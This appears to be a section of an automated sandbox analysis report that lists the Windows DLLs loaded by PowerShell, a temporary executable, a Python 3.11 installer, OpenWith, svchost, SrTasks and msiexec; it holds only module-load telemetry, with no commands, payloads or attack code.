Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeSection loaded: feclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: feclient.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: srclient.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: spp.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: usoapi.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: sxproxy.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: feclient.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: spp.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: srclient.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: srcore.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: ktmw32.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: wer.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: bcd.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: msxml3.dll
Source: C:\Windows\System32\SrTasks.exeSection loaded: vss_ps.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
